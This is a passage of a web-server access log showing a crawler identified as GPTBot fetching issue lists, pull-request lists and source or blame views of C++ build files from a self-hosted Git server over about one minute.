-[17/Feb/2026:18:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11221] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11220] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11433] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:18:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:18:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11220] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11220] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:18:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11222] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:18:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:18:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11434] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:18:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42760] [Gzip 21.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35741] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42735] [Gzip 21.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35738] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13145] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35731] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35705] [Gzip 10.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42765] [Gzip 21.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42767] [Gzip 21.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13145] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13143] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46762] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46761] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12998] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46755] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46733] [Gzip 22.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9982] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr 